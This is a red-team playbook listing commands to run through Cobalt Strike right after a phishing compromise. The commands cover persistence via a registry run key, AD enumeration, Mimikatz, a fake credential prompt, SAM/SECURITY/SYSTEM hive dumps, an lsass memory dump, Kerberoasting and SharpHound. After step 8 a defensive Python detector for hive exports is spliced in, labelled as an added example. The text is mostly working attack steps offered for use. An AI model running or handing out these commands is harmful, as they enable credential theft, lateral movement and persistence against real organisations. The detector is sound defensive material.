Red Team Play-book - Initial Enumeration

Sometimes the first shell, beacon or agent you receive back from a successful phishing attempt is the perfect opportunity to get the lay of the land and extract as much useful information as you can, in case the organization's SOC locks you out after a short period of time.

The following is a non-exhaustive list of commands that you could run through Cobalt Strike to achieve various tasks immediately after compromise.

I have performed these commands using Cobalt Strike in a tiny Active Directory environment of just a DC and a workstation but obviously you can run these in a much larger enterprise environment and yield better results.

1. Persistence

Using Zonksec's aggressor script, which can be found on his GitHub here, this is a simple process. Just load the script in Cobalt Strike, type the following command and select the listener. It will drop a batch file in C:\Users\Public\:

persistence Add RegKeyRun

2. Get the GAL (Outlook Offline Address Book, .oab)

Go to [Beacon] -> Explore -> File Browser

Then browse to and download the .oab files.

3. Get "Active" AD Computers and some information about them

powershell-import /path/to/PowerView.ps1
powershell Get-DomainComputer -LDAPFilter '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' -Properties operatingSystem,operatingSystemServicePack,operatingSystemVersion,servicePrincipalName

4. Get "Active" AD Users, and information about them

powershell-import /path/to/PowerView.ps1
powershell Get-DomainUser -LDAPFilter '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' -Properties distinguishedname,samaccountname,pwdlastset,userPrincipalName,mail,userWorkstations,memberOf

5. Gather basic system information (the script can be found here).

shell systeminfo
powershell-import /path/to/Invoke-HostEnum.ps1
powershell Invoke-HostEnum -Local -Domain

6. Privilege Escalation

powershell-import /path/to/PowerUp.ps1
powershell Invoke-AllChecks

7. (Assuming System) Run Mimikatz

Right Click on Beacon > Access > Run Mimikatz

8. If user credentials are still required, prompt for them via a pop-up. Download the script from here.

powershell-import /path/to/Invoke-LoginPrompt.ps1
powershell Invoke-LoginPrompt

8. (Assuming System) Dump HKLM\SAM, HKLM\SECURITY and HKLM\SYSTEM to get local accounts

shell reg.exe save hklm\sam c:\temp\sam.hiv
shell reg.exe save hklm\security c:\temp\security.hiv
shell reg.exe save hklm\system c:\temp\system.hiv
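From the defender's side, the three reg.exe hive exports above are a high-signal detection opportunity: legitimate software almost never saves SAM, SECURITY or SYSTEM to a file. The following is an added example (not part of the original playbook) that flags such exports in process-creation command lines; the sample events are constructed and the field names (User, CommandLine) are assumed to come from a parsed Security 4688 or Sysmon Event 1 record.

```python
import re
from typing import Optional

# Hives whose export gives offline access to local account hashes (SAM),
# LSA secrets (SECURITY) and the boot key needed to decrypt them (SYSTEM).
SENSITIVE_HIVES = {"sam", "security", "system"}

# Matches "reg save <hive> <file>" in short (hklm) or long (HKEY_LOCAL_MACHINE)
# notation, tolerant of case, quoting and a full path to reg.exe.
_REG_SAVE = re.compile(
    r"""(?:^|[\\\s"'])reg(?:\.exe)?["']?\s+save\s+["']?
        (?:hklm|hkey_local_machine)\\(?P<hive>[a-z]+)""",
    re.IGNORECASE | re.VERBOSE,
)

def hive_export_alert(command_line: str) -> Optional[str]:
    """Return the hive name if the command exports a credential-bearing
    registry hive, otherwise None."""
    m = _REG_SAVE.search(command_line)
    if not m:
        return None
    hive = m.group("hive").lower()
    return hive if hive in SENSITIVE_HIVES else None

def scan_events(events):
    """events: iterable of dicts with 'User' and 'CommandLine' keys (assumed
    field names). Returns the events that exported a sensitive hive,
    annotated with the hive name."""
    hits = []
    for ev in events:
        hive = hive_export_alert(ev.get("CommandLine", ""))
        if hive:
            hits.append({**ev, "Hive": hive})
    return hits

# Constructed sample events (not from a real host), mirroring the commands
# a beacon would spawn via "shell reg.exe save ...", plus benign lookalikes.
SAMPLE_EVENTS = [
    {"User": "LAB\\alice", "CommandLine": r"reg.exe save hklm\sam c:\temp\sam.hiv"},
    {"User": "LAB\\alice", "CommandLine": r'"C:\Windows\System32\reg.exe" save HKEY_LOCAL_MACHINE\SECURITY C:\temp\sec.hiv'},
    {"User": "LAB\\alice", "CommandLine": r"reg save hklm\system c:\temp\system.hiv"},
    {"User": "LAB\\bob", "CommandLine": r"reg.exe save hklm\software\myapp c:\temp\app.hiv"},
    {"User": "LAB\\bob", "CommandLine": r"reg.exe query hklm\sam"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"ALERT {hit['User']}: {hit['Hive']} hive exported: {hit['CommandLine']}")
```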

9. (Assuming System) Get LSA secrets

powershell-import /path/to/Out-Minidump.ps1
powershell Get-Process lsass | Out-Minidump -DumpFilePath C:\Windows\Temp

10. Kerberoast SPNs in the local domain; you can find the raw script here:

powershell-import /path/to/autokerberoast.ps1
powershell Invoke-AutoKerberoast

(The test domain is not configured with any SPNs.)

11. Run SharpHound; you can download it from here:

powershell-import /path/to/Sharphound.ps1
powershell Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -CompressData -RemoveCSV

Then download the generated zip file.

12. Check Share Access:

powershell-import /path/to/PowerView.ps1
powershell Invoke-ShareFinder -ExcludePrint -ExcludeIPC -CheckShareAccess